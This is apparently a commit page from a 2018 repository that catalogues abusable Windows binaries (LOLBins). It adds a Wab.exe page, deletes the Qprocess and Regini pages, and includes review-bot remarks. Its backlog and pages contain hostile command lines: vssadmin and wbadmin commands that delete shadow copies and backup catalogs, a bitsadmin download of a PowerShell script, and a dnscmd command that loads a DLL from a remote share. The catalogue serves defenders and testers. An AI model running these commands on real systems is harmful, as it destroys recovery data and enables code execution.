This repository has been archived by the owner. It is now read-only.
Cleaning and adding Wab.exe

Oddvar Moe committed May 9, 2018
1 parent 8b1e87b commit 118c337dfb9cf88152a1c82448cffdb37a71681f
Showing with 50 additions and 67 deletions.
  1. +2 −1 Backlog.txt
  2. +1 −2 LOLBins.md
  3. +5 −1 OSBinaries/Dnscmd.md
  4. +0 −31 OSBinaries/Qprocess.md
  5. +0 −30 OSBinaries/Regini.md
  6. +38 −0 OSBinaries/Wab.md
  7. +4 −2 OtherMSBinaries/Sqldumper.md
@@ -3,7 +3,6 @@ Kd.exe Debugger
Certreq.exe Exfiltrate data
Dbghost.exe
Robocopy.exe Needs examples
Bitsadmin.exe bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
Vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
notepad.exe Gui - Download files using Open (A lot of other programs as well) LOLGuiBins?
wbadmin.exe wbadmin delete catalog -quiet
@@ -15,3 +14,5 @@ WseClientSvc.exe - https://blog.huntresslabs.com/abusing-trusted-applications-a7
dvdplay.exe http://www.hexacorn.com/blog/2018/03/15/beyond-good-ol-run-key-part-73/
http://www.hexacorn.com/blog/category/living-off-the-land/pass-thru-command-execution/
https://twitter.com/Hexacorn/status/993498264497541120
https://twitter.com/Hexacorn/status/994000792628719618
https://github.com/MoooKitty/Code-Execution
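Review bot: the tweet https://twitter.com/Hexacorn/status/994000792628719618 is added to this backlog and, in the same commit, to the Resources list of OSBinaries/Dnscmd.md; once a link is triaged into a binary's page the backlog copy can go. The other bare Hexacorn and MoooKitty URLs here carry no hint of which binary they concern, so a short tag per line (as the dvdplay.exe entry above has) would keep the backlog triageable.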
@@ -46,12 +46,10 @@ If you are missing from the acknowledgement, please let me know (I did not forge
[Presentationhost.exe](OSBinaries/Presentationhost.md)
[Print.exe](OSBinaries/Print.md)
[Psr.exe](OSBinaries/Psr.md)
[Qprocess.exe](OSBinaries/Qprocess.md)
[Reg.exe](OSBinaries/Reg.md)
[Regedit.exe](OSBinaries/Regedit.md)
[Regasm.exe](OSBinaries/Regasm.md)
[Register-cimprovider.exe](OSBinaries/Register-cimprovider.md)
[Regini.exe](OSBinaries/Regini.md)
[Regsvcs.exe](OSBinaries/Regsvcs.md)
[Regsvr32.exe](OSBinaries/Regsvr32.md)
[Replace.exe](OSBinaries/Replace.md)
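Review bot: the Qprocess.exe and Regini.exe entries drop out of the index here together with the deletion of OSBinaries/Qprocess.md and OSBinaries/Regini.md, but neither the commit message ("Cleaning and adding Wab.exe") nor Backlog.txt records why those two no longer qualify as LOLBins; a one-line reason would save the next contributor from re-adding them.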
@@ -63,6 +61,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
[Sc.exe](OSBinaries/Sc.md)
[Scriptrunner.exe](OSBinaries/Scriptrunner.md)
[Syncappvpublishingserver.exe](OSBinaries/Syncappvpublishingserver.md)
[Wab.exe](OSBinaries/Wab.md)
[Wmic.exe](OSBinaries/Wmic.md)
[Wscript.exe](OSBinaries/Wscript.md)
[Xwizard.exe](OSBinaries/Xwizard.md)
@@ -7,15 +7,19 @@ dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
```

Acknowledgements:
* Dimitrios Slamaris - @dim0x69
* Shay Ber - ?
* Dimitrios Slamaris - @dim0x69
* Nikhil SamratAshok Mittal - @nikhil_mitt

Code sample:
*

Resources:
* https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
* https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
* https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp
* https://twitter.com/Hexacorn/status/994000792628719618
* http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html

Full path:
```
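Review bot: the Acknowledgements list now contains "Dimitrios Slamaris - @dim0x69" twice; drop one of the two. "Shay Ber - ?" still carries a placeholder handle, and "Code sample:" is an empty bullet, so the page documents the dnscmd.exe /config /serverlevelplugindll technique only through the external links; if no sample is going to be added, the empty bullet should be removed rather than left as "*".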
OSBinaries/Qprocess.md: This file was deleted.

OSBinaries/Regini.md: This file was deleted.
@@ -0,0 +1,38 @@
## Wab.exe

* Functions: Execute

```
Wab.exe (requires registry changes)
```

Acknowledgements:
* Adam - @Hexacorn

Code sample:
*

Resources:
* http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
* https://twitter.com/Hexacorn/status/991447379864932352

Full path:
```
C:\Program Files\Windows Mail\wab.exe
C:\Program Files (x86)\Windows Mail\wab.exe
```

Notes:
Searches for wab.dll. Can be manipulated with the following registry key:
```
HKLM\Software\Microsoft\WAB\DLLPath
```

Binary is used to manage Windows contacts/wab files. (Legacy)


Detection:
Look for registry changes to HKLM\Software\Microsoft\WAB\DLLPath



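Review bot: the command block under "Functions: Execute" holds only the text "Wab.exe (requires registry changes)" and the Code sample bullet is empty, so the registry change the technique depends on is described only under Notes; move the HKLM\Software\Microsoft\WAB\DLLPath key up into the command block, or point the Code sample at the Hexacorn post already listed under Resources. Detection reads "Look for registry changes to HKLM\Software\Microsoft\WAB\DLLPath"; it would be sharper paired with the loader-side signal the Notes imply, wab.exe loading the DLL named by that value instead of its usual wab.dll, since a registry write alone can be missed if the key is set before monitoring starts. The file also ends with three trailing blank lines.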
@@ -21,11 +21,13 @@ Resources:

Full path:
```
C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe
```

Notes:

Part of SQL server, but also Office in some versions.



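Review bot: the Full path block lists "C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe" twice; drop the duplicate, or, if the second line was meant to be a different install location (the Program Files (x86) tree, say), spell that path out. "Notes:" is followed by an empty line before its one sentence, unlike the Wab.md entry added in this commit, where the text follows the heading directly.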